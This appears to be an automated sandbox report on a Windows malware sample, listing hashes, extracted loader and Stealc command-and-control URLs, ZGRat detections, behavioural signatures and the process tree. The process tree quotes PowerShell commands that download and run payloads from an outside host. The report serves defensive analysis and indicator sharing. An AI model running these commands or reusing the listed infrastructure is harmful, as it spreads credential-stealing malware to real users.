Analysis
-
max time kernel
148s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
09-05-2024 15:43
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/INetC.dll
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/INetC.dll
Resource
win10v2004-20240426-en
General
-
Target
file.exe
-
Size
49KB
-
MD5
213c0265511727869c959abd24ea3677
-
SHA1
22ea6fe23eeb57d0048d1b0e2a826dd66c6969d9
-
SHA256
3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7
-
SHA512
bfa4d229ade2e47d91f3fb761e68f727aab86980a2697cb06955324e9b61b384569a285edfaa1d1dd7aea95e24d171a770a4f573a19ec795325c68250720f41e
-
SSDEEP
1536:XferrLkSRoe8C4UZsys0Dh1duFpxFI+PlZ:Xfi3k+oWDBDh1duFpkWlZ
Malware Config
Extracted
https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000
Extracted
https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000
Extracted
https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000
Extracted
stealc
http://185.172.128.150
-
url_path
/c698e1bc8a2f5e6d.php
Signatures
-
Detect ZGRat V1 3 IoCs
resource yara_rule behavioral2/memory/4436-141-0x00000261F6D90000-0x00000261FA5C4000-memory.dmp family_zgrat_v1 behavioral2/memory/4436-142-0x00000261FE510000-0x00000261FE61A000-memory.dmp family_zgrat_v1 behavioral2/memory/4436-146-0x00000261FC5A0000-0x00000261FC5C4000-memory.dmp family_zgrat_v1 -
Blocklisted process makes network request 5 IoCs
flow pid Process 16 3360 powershell.exe 18 3744 powershell.exe 19 3744 powershell.exe 21 3840 powershell.exe 23 3840 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation i1.exe Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation u3do.1.exe -
Executes dropped EXE 3 IoCs
pid Process 4380 i1.exe 1076 u3do.0.exe 2604 u3do.1.exe -
Loads dropped DLL 1 IoCs
pid Process 4680 file.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
pid Process 3360 powershell.exe 3744 powershell.exe 3840 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3064 4380 WerFault.exe 85 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u3do.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u3do.1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u3do.1.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u3do.0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u3do.0.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 3360 powershell.exe 3360 powershell.exe 3744 powershell.exe 3744 powershell.exe 3840 powershell.exe 3840 powershell.exe 4436 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4436 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4436 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4436 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4436 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4436 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4436 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4436 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4436 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4436 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4436 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4436 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4436 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4436 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4436 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4436 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4436 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4436 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4436 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4436 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 4436 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 1076 u3do.0.exe 1076 u3do.0.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3360 powershell.exe Token: SeDebugPrivilege 3744 powershell.exe Token: SeDebugPrivilege 3840 powershell.exe Token: SeDebugPrivilege 4436 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 2604 u3do.1.exe 2604 u3do.1.exe 2604 u3do.1.exe 2604 u3do.1.exe 2604 u3do.1.exe 2604 u3do.1.exe 2604 u3do.1.exe -
Suspicious use of SendNotifyMessage 7 IoCs
pid Process 2604 u3do.1.exe 2604 u3do.1.exe 2604 u3do.1.exe 2604 u3do.1.exe 2604 u3do.1.exe 2604 u3do.1.exe 2604 u3do.1.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 4680 wrote to memory of 988 4680 file.exe 81 PID 4680 wrote to memory of 988 4680 file.exe 81 PID 4680 wrote to memory of 988 4680 file.exe 81 PID 988 wrote to memory of 3360 988 cmd.exe 83 PID 988 wrote to memory of 3360 988 cmd.exe 83 PID 988 wrote to memory of 3360 988 cmd.exe 83 PID 988 wrote to memory of 3744 988 cmd.exe 84 PID 988 wrote to memory of 3744 988 cmd.exe 84 PID 988 wrote to memory of 3744 988 cmd.exe 84 PID 988 wrote to memory of 4380 988 cmd.exe 85 PID 988 wrote to memory of 4380 988 cmd.exe 85 PID 988 wrote to memory of 4380 988 cmd.exe 85 PID 988 wrote to memory of 3840 988 cmd.exe 86 PID 988 wrote to memory of 3840 988 cmd.exe 86 PID 988 wrote to memory of 3840 988 cmd.exe 86 PID 4380 wrote to memory of 1076 4380 i1.exe 89 PID 4380 wrote to memory of 1076 4380 i1.exe 89 PID 4380 wrote to memory of 1076 4380 i1.exe 89 PID 4380 wrote to memory of 2604 4380 i1.exe 91 PID 4380 wrote to memory of 2604 4380 i1.exe 91 PID 4380 wrote to memory of 2604 4380 i1.exe 91 PID 2604 wrote to memory of 4436 2604 u3do.1.exe 96 PID 2604 wrote to memory of 4436 2604 u3do.1.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4680 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsn4DA4.tmp\est.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000','stat')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3360
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3744
-
-
C:\Users\Admin\AppData\Local\Temp\i1.exei1.exe /SUB=2838 /str=one3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Users\Admin\AppData\Local\Temp\u3do.0.exe"C:\Users\Admin\AppData\Local\Temp\u3do.0.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1076
-
-
C:\Users\Admin\AppData\Local\Temp\u3do.1.exe"C:\Users\Admin\AppData\Local\Temp\u3do.1.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD15⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4436
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 11564⤵
- Program crash
PID:3064
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000', 'i2.bat')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3840
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4380 -ip 43801⤵PID:1912
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD56195a91754effb4df74dbc72cdf4f7a6
SHA1aba262f5726c6d77659fe0d3195e36a85046b427
SHA2563254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5
SHA512ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89
-
Filesize
16KB
MD55e79766dc6d8c05c9f1938344e364279
SHA101e3df80e48ca839cbdfa84841989495fd2db0e0
SHA2569aab27ad18fd6b1169d2ebeb7113f83989465544c48558d8668c3f9c41ba0ffe
SHA5121cdec040cfe29dab7f4fb93758871fb77f5b689f439198688cb012bd30f161ead7a000198b01c223ad40d4e5b95aa3e194a850569661101ab076876cb74aa807
-
Filesize
16KB
MD5d5ed3d02628557603b0375ccbe8ff85b
SHA117f3c7b8b2e412c27f6199e77711d194a6cf82bf
SHA25698d23949fe323631d1cad4867835aa4edec29d2e253dd8060cc93202afaf5909
SHA512c48d20ec63871a96ef4f82cc62d9823b1eaafd71f0943df2ce8a20c5ac3182c7c704476bda050fa6418ac8ed242c2fd8b6924baae06480fea1a80548db9fe0b8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
382KB
MD5278218d2ac13d2d7134e6e9a0828e4d5
SHA105066b895c41396d0321bc3a032f2f7c2e1811e3
SHA256c697ba11d34c3fcce2efe3d2699c68c933f986b36ccb6b9fb0e9c08fcbcfa7e0
SHA512f1e41a457c01a6ad0ac00e3a004023429d644b1a9bb193afd277f333f1bd4bd00059e37c6df2565b9c7e8bda3cbe3f713b2d39d04ca0c5ad169788efdb230b7d
-
Filesize
25KB
MD540d7eca32b2f4d29db98715dd45bfac5
SHA1124df3f617f562e46095776454e1c0c7bb791cc7
SHA25685e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA5125fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d
-
Filesize
735B
MD5f32d05160acf8325e9a09f09f80d16f4
SHA146e159b71e6ef99076c4002e1fda134e1d0a86c9
SHA256da8f4f45b105538f0063ece220b69455b15c8e680099c02221c093ecb794ae37
SHA512147c870edd09fa3f6cd93caae809b5d66fecc759e3cfee4e47dc487786edc760989fdb23310b4284e63871fe1b1d805e949601f54bfc93ff80e2e097a989879b
-
Filesize
218KB
MD55246be38e251c182f838adf4ef42ad40
SHA1fe09ba5ee40d4c4897c8f8e3fa819c13b0e324d9
SHA2567dbf762b2ef2b651a4e8c7b7d9b8996a1de0cfa44119452f1d3f29bfe03dfd86
SHA512a3f7c75a2355935d19c733d67aeff3e08f382ae60c1ba45364974ff91ca779ac5e49c40475fe35b8923a130e8670de0311fdf3c03de935312869e9a9a8b21b14
-
Filesize
4.6MB
MD5397926927bca55be4a77839b1c44de6e
SHA1e10f3434ef3021c399dbba047832f02b3c898dbd
SHA2564f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954